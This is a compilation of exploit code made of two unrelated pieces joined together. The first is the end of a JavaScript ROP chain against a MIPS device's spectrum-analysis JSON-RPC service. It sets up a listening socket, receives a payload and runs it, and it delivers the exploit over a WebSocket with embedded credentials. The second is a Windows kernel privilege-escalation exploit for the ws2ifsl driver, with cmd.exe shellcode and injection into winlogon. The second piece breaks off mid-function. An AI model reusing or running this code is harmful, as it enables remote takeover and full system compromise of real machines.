insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44]) //0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call memset

previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp, [0x41, 0x2, 0x5, 0x39]) //set s0 = port
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

// previousSp = sp
// sp = previousSp+0x10
// insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, sp-1, socketAddr)
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) //0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20; //store port

// previousSp = sp
// sp = previousSp+0x20
// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;

socketAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x1c]
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) //0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) //0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp+0x4-1, serverAddr) //set s1 = server
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8]) //0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp-1, [0xe2, 0x80, 0x8a, 0x62, 0x4c])
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18]) //0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44]) //0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call bind

previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) //0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) //0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) //0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x91, 0x20]) //set s0 = listen - 0x
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) //0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;

previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call listen

previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) //0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) //0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x8, 0x40, 0x8]) //0x80084008: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xe2, 0x80, 0x8a, 0xd8, 0x84]) //set s0 = accept
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x14, 0x27, 0x10]) //0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call accept

//0x80a05b24
clientAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x24]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, clientAddr) //set s0 = clientAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) //0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;

// previousSp = sp
// sp = previousSp+0x20
// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;

clientAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x20]
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, clientAddrM4) //set s0 = clientAddr - 4
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) //0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) //0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x4c, 0x10, 0x38]) //0x804c1038: addiu $a2, $zero, 0x400; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

//0x80a05c30
payloadAddr = [0xe2, 0x80, 0xa0, 0x5c, 0x30]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp+0x4-1, payloadAddr) //set s1 = payload
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8]) //0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x46, 0x73, 0x68]) //0x80467368: move $a3, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x93, 0x3c]) //set s0 = recv - 0x
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) //0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;

previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call recv

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) // 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;

previousSp = sp
sp = previousSp+0x20
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x12, 0x3b, 0x7c]) //0x80123b7c: addiu $a0, $a0, 4; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0xab, 0x5c]) //set s0 = sleep
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call sleep

previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, payloadAddr) //set s0 = payload
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

var string = new TextDecoder("utf-8").decode(arr);
var newArr = new TextEncoder("utf-8").encode(string);
console.log(buf2hex(newArr));

exploit = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":' + string + ',"fStopHz":1000000000,"fftSize":1024,"gain":1},"id":"0"}'
console.log(exploit)
console.log(testEqual(arr, newArr));

var socket = new WebSocket("ws://spectrum:[email protected]:6080/Frontend", 'rpc-frontend')
socket.onopen = function(e) {
  socket.send(exploit)
  fetch('/payload')
};
17. /*
The exploit works on 19H1. It was tested with ntoskrnl version 10.0.18362.295

EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47935.zip
*/

#include <Windows.h>
#include <stdio.h>
#include <string>
#include <ntstatus.h>
#include <processthreadsapi.h>
#include <winternl.h>
#include <tlhelp32.h>

#pragma comment(lib, "ntdll.lib")

// run cmd.exe
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51"
"\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52"
"\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed"
"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88"
"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49"
"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a"
"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47"
"\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65"
"\x78\x65\x00";

static const unsigned int shellcode_len = 0x1000;

#define MAXIMUM_FILENAME_LENGTH 255
#define SystemModuleInformation 0xb
#define SystemHandleInformation 0x10

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    void* Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE Handels[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

typedef struct SYSTEM_MODULE {
    ULONG Reserved1;
    ULONG Reserved2;
#ifdef _WIN64
    ULONG Reserved3;
#endif
    PVOID ImageBaseAddress;
    ULONG ImageSize;
    ULONG Flags;
    WORD Id;
    WORD Rank;
    WORD w018;
    WORD NameOffset;
    CHAR Name[MAXIMUM_FILENAME_LENGTH];
} SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG ModulesCount;
    SYSTEM_MODULE Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

// exploit specific type information
typedef struct _FILE_FULL_EA_INFORMATION {
    ULONG NextEntryOffset; // +0x0
    UCHAR Flags;           // +4
    UCHAR EaNameLength;    // +5
    USHORT EaValueLength;  // +6
    CHAR EaName[1];        // +9
} FILE_FULL_EA_INFORMATION, * PFILE_FULL_EA_INFORMATION;

typedef struct _PROC_DATA {
    HANDLE apcthread; // +0x0
    void* unknown1;   // +0x8
    void* unknown2;   // +0x10
    void* unknown3;   // +0x18
    void* unknown4;   // +0x20
} PROC_DATA, * PPROC_DATA;

typedef struct _SOCK_DATA {
    HANDLE unknown;        // +0x0
    HANDLE procDataHandle; // +0x8
} SOCK_DATA, * PSOCK_DATA;

// undocumented apis definitions
typedef NTSTATUS(WINAPI* NtWriteFile_t)(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID Buffer, ULONG Length, PLARGE_INTEGER ByteOffset, PULONG key);
typedef NTSTATUS(WINAPI* NtTestAlert_t)(void);
typedef NTSTATUS(WINAPI* RtlGetVersion_t)(PRTL_OSVERSIONINFOW lpVersionInformation);

// resolved function pointers at runtime
NtTestAlert_t g_NtTestAlert = 0;
NtWriteFile_t g_NtWriteFile = 0;
RtlGetVersion_t g_RtlGetVersion = 0;

HANDLE g_Event1 = NULL;
HANDLE g_Event2 = NULL;
HANDLE g_Event3 = NULL;
int g_done1 = 0;
int g_done2 = 0;

#define TOKEN_OFFSET 0x40      //_SEP_TOKEN_PRIVILEGES offset
#define OFFSET_LINKEDLIST 0xA8 //kthread apc offset

// generic helper function
void InjectToWinlogon() {
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    int pid = -1;
    if (Process32First(snapshot, &entry)) {
        while (Process32Next(snapshot, &entry)) {
            if (_strcmpi(entry.szExeFile, "winlogon.exe") == 0) {
                pid = entry.th32ProcessID;
                break;
            }
        }
    }
    CloseHandle(snapshot);
    if (pid < 0) {
        printf("Could not find process\n");
        return;
    }
    HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!h) {
        printf("Could not open process: %x", GetLastError());
        return;
    }
    void* buffer = VirtualAllocEx(h, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!buffer) {
        printf("[-] VirtualAllocEx failed\n");
        return;
    }
    if (!WriteProcessMemory(h, buffer, shellcode, sizeof(shellcode), 0)) {
        printf("[-] WriteProcessMemory failed");
        return;
    }
    // CreateRemoteThread returns NULL (not INVALID_HANDLE_VALUE) on failure
    HANDLE hthread = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0);
    if (!hthread) {
        printf("[-] CreateRemoteThread failed");
        return;
    }
}

HMODULE GetNOSModule() {
    HMODULE hKern = 0;
    hKern = LoadLibraryEx("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
    return hKern;
}

DWORD64 GetModuleAddr(const char* modName) {
    PSYSTEM_MODULE_INFORMATION buffer = (PSYSTEM_MODULE_INFORMATION)malloc(0x20);
    DWORD outBuffer = 0;
    NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, 0x20, &outBuffer);
    if (status == STATUS_INFO_LENGTH_MISMATCH) {
        free(buffer);
        buffer = (PSYSTEM_MODULE_INFORMATION)malloc(outBuffer);
        status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, outBuffer, &outBuffer);
    }
    if (!buffer) {
        printf("[-] NtQuerySystemInformation error\n");
        return 0;
    }
    for (unsigned int i = 0; i < buffer->ModulesCount; i++) {
        PVOID kernelImageBase = buffer->Modules[i].ImageBaseAddress;
        PCHAR kernelImage = (PCHAR)buffer->Modules[i].Name;
        if (_stricmp(kernelImage, modName) == 0) {
            free(buffer);
            return (DWORD64)kernelImageBase;
        }
    }
    free(buffer);
    return 0;
}

DWORD64 GetKernelPointer(HANDLE handle, DWORD type) {
    PSYSTEM_HANDLE_INFORMATION buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(0x20);
    DWORD outBuffer = 0;
    NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, 0x20, &outBuffer);
    if (status == STATUS_INFO_LENGTH_MISMATCH) {
        free(buffer);
        buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(outBuffer);
        status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, outBuffer, &outBuffer);
    }
    if (!buffer) {
        printf("[-] NtQuerySystemInformation error \n");
        return 0;
    }
    for (size_t i = 0; i < buffer->NumberOfHandles; i++) {
        DWORD objTypeNumber = buffer->Handels[i].ObjectTypeNumber;
        if (buffer->Handels[i].ProcessId == GetCurrentProcessId() && buffer->Handels[i].ObjectTypeNumber == type) {
            if (handle == (HANDLE)buffer->Handels[i].Handle) {
                //printf("%p %d %x\n", buffer->Handels[i].Object, buffer->Handels[i].ObjectTypeNumber, buffer->Handels[i].Handle);
                DWORD64 object = (DWORD64)buffer->Handels[i].Object;
                free(buffer);
                return object;
            }
        }
    }
    printf("[-] handle not found\n");
    free(buffer);
    return 0;
}

DWORD64 GetGadgetAddr(const char* name) {
    DWORD64 base = GetModuleAddr("\\SystemRoot\\system32\\ntoskrnl.exe");
    HMODULE mod = GetNOSModule();
    if (!mod) {
        printf("[-] leaking ntoskrnl version\n");
        return 0;
    }
    DWORD64 offset = (DWORD64)GetProcAddress(mod, name);
    DWORD64 returnValue = base + offset - (DWORD64)mod;
    FreeLibrary(mod);
    return returnValue;
}

/*
After the bug is triggered the first time, this thread gets notified and it will trigger its
function pointer, which will call our gadget function and write the first 8 bytes.
*/
DWORD WINAPI APCThread1(LPVOID lparam) {
    SetEvent(g_Event1);
    while (1) {
        if (g_done1) {
            printf("[+] triggering first APC execution\n");
            g_NtTestAlert();
            while (1) {
                Sleep(0x1000);
            }
        }
        else {
            Sleep(1);
        }
    }
    return 0;
}

/*
After the bug is triggered the second time, this thread gets notified and it will trigger its
function pointer again and write the second 8 bytes. After that the shellcode is injected into
the system process.
*/
DWORD WINAPI APCThread2(LPVOID lparam) {
    SetEvent(g_Event2);
    while (1) {
        if (g_done2) {
            printf("[+] triggering second APC execution\n");
            g_NtTestAlert();
            InjectToWinlogon();
            SetEvent(g_Event3);
            while (1) {
                Sleep(0x1000);
            }
        }
        else {
            Sleep(1);
        }
    }
    return 0;
}

HANDLE CreateSocketHandle(HANDLE procHandle) {
    HANDLE fileHandle = 0;
    UNICODE_STRING deviceName;
    OBJECT_ATTRIBUTES object;
    IO_STATUS_BLOCK IoStatusBlock;
    RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsSct");
    InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL);
    FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(SOCK_DATA));
    if (!eaBuffer) {
        printf("[-] malloc error\n");
        return fileHandle;
    }
    eaBuffer->NextEntryOffset = 0;
    eaBuffer->Flags = 0;
    eaBuffer->EaNameLength = sizeof("NifsSct") - 1;
    eaBuffer->EaValueLength = sizeof(SOCK_DATA);
    RtlCopyMemory(eaBuffer->EaName, "NifsSct", (SIZE_T)eaBuffer->EaNameLength + 1);
    SOCK_DATA * eaData = (SOCK_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") - 4);
    eaData->unknown = (void*) 0x242424224;
    eaData->procDataHandle = (void*) procHandle;
    NTSTATUS status = NtCreateFile(&fileHandle, GENERIC_WRITE, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(PROC_DATA));
    if (status != STATUS_SUCCESS) {
        printf("[-] NtCreateFile error: %x \n", status);
        free(eaBuffer);
        return fileHandle;
    }
    free(eaBuffer);
    return fileHandle;
}

HANDLE CreateProcessHandle(HANDLE hAPCThread) {
    HANDLE fileHandle = 0;
    UNICODE_STRING deviceName;
    OBJECT_ATTRIBUTES object;
    IO_STATUS_BLOCK IoStatusBlock;
    RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsPvd");
    InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL);
    FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA));
    if (!eaBuffer) {
        printf("[-] malloc error\n");
        return fileHandle;
    }
    eaBuffer->NextEntryOffset = 0;
    eaBuffer->Flags = 0;
    eaBuffer->EaNameLength = sizeof("NifsPvd") - 1;
